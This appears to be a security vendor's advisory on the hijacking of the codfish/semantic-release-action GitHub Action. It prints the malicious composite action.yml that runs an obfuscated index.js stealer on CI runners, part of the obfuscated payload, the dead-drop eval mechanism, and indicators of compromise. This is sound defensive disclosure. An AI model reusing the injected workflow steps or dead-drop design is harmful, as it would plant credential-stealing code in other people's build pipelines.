On Jun 24, 2026, the codfish/semantic-release-action GitHub Action was compromised through an imposter commit attack. An attacker force-pushed two malicious commits into the repository and repointed sixteen tags to them, including the floating major version tags v2, v3, v4, and v5. Any workflow referencing the action by one of those tags will pull and run the attacker's code on its next CI run.
This action has been the standard way to wire semantic-release into GitHub Actions since 2019 and carries over 100 GitHub stars. Workflows that use it for automated releases almost always hold a GITHUB_TOKEN and frequently an NPM_TOKEN with publish access, which is exactly the kind of access an attacker wants to land inside.
How the tags were hijacked
Git tags aren't protected by default. Anyone with push access to a repository can force a tag to point at a different commit, and GitHub Actions resolves a tag reference at the moment a workflow runs. Moving a tag retroactively rewrites every future run that references it, with no signal to the person who wrote the workflow.
The attacker used this against codfish/semantic-release-action in two stages. The first malicious commit picked up fifteen tags: v2.2.1, the entire v3 line (v3, v3.0.0 through v3.5.0), the entire v4 line (v4, v4.0.0, v4.0.1), and the entire v5 line (v5, v5.0.0). A second commit is a direct child of the first and took the v2 tag. Both commits ship a byte-identical index.js payload, confirmed by hash.
Neither commit is an ancestor of the repository's main branch. They were grafted in as orphans, then dressed up to avoid suspicion in a quick git log skim. The first commit reuses the author identity, date, and commit message of a real commit from Nov 9, 2023:
commit 5792aba0e2180b9b80b77644370a6889d5817456
Author: Chris O'Donnell <1666298+codfish@users.noreply.github.com>
Date: Thu Nov 9 16:49:48 2023 +0000
Merge pull request #195 from codfish/force-installThat metadata is real, lifted from a legitimate merge in the project's history. However, the file contents were swapped out for the malicious payload.
What changed in action.yml
codfish/semantic-release-action originally ran as a Docker-based action, building a container from the repository's Dockerfile and invoking entrypoint.js. The malicious commits replace action.yml with a composite action instead:
runs:
using: composite
steps:
- uses: "codfish/semantic-release-action@8f9a58f2acdc190c356f79159b5de2548cdb63cd"
with:
branches: "${{ inputs.branches }}"
# ...remaining inputs passed through unchanged
- uses: "oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6"
if: always()
- name: Cleanup Action
if: always()
shell: bash
run: bun run $GITHUB_ACTION_PATH/index.jsThe first step still calls the real, current codfish/semantic-release-action, pinned to a clean commit, so the action keeps functioning normally, and a workflow run looks successful. The two steps after it run with if: always(), so they fire whether the legitimate step succeeds, fails, or gets skipped. The second step pulls in oven-sh/setup-bun, a real and otherwise unrelated third-party action, purely to get the Bun runtime onto the CI runner. The third step executes the payload, index.js, with bun run.
The repository's original Dockerfile, entrypoint.js, and entrypoint.spec.js are still sitting in the tree at this commit. They are simply never invoked anymore, since a composite action ignores them entirely. Leaving the old files in place is a minimal diff cover. Anyone skimming a file listing sees the action's usual contents and nothing obviously missing.
The payload
The injected index.js is 781,580 bytes of obfuscated JavaScript, structured as a string array with hex coded variable names, the output style of a typical commercial JavaScript obfuscator:
const _0x307419=_0x42e6;(function(_0xb5d033,_0x1d1124){const _0x23f080={_0x15a6a0:0xf9,_0x3d6efe:0x73a,...Buried in the obfuscated body is the string thebeautifulsnadsoftime, a near match for TheBeautifulSandsOfTime and off by a single transposed letter. That string identifies one of the dead drop channels used by the Miasma credential stealing toolkit, leaked publicly on Jun 10, 2026. Miasma's design avoids a traditional C2 server. Instead of calling out to attacker infrastructure, the malware periodically searches GitHub's public commit search API for that marker string. When it finds a matching commit, it treats the attached payload as a signed command and runs it through eval(). That gives the operator a way to deliver fresh remote code execution to every infected runner without standing up or maintaining infrastructure of their own, and without generating the outbound network traffic that egress monitoring usually flags.
Connection to the Miasma campaign
The same TheBeautifulSandsOfTime marker already shows up in Miasma campaign activity against npm packages under the @redhat-cloud-services scope, and in several other compromised GitHub repositories tied to the same toolkit leak. Once a credential stealing framework like this goes public, it tends to spread quickly, since any operator can run it without writing their own tooling. codfish/semantic-release-action fits that pattern, another instance of the same toolkit reaching a new repository.
How Aikido detects this
If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.
If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.
For broader coverage across your whole team, Aikido's Device Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.
For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.
Indicators of compromise
Malicious commits
5792aba0e2180b9b80b77644370a6889d5817456(tagsv2.2.1,v3,v3.0.0throughv3.5.0,v4,v4.0.0,v4.0.1,v5,v5.0.0)bcb6b1d409144318e8fad2171d6fe06d02299d1a(tagv2)
Payload hash
index.js (both malicious commits): sha256 9f93d77d32833a515bc406c46da477142bb1ac2babeecb6aa42f98669a6db015
Other indicators
- Dead drop marker string:
thebeautifulsnadsoftime - Bun runtime pulled in via
oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6
Affected tags
codfish/semantic-release-action@v2codfish/semantic-release-action@v2.2.1codfish/semantic-release-action@v3throughv3.5.0codfish/semantic-release-action@v4,v4.0.0,v4.0.1codfish/semantic-release-action@v5,v5.0.0
Confirmed clean
codfish/semantic-release-action@v1.0.0throughv1.10.0codfish/semantic-release-action@v2.0.0
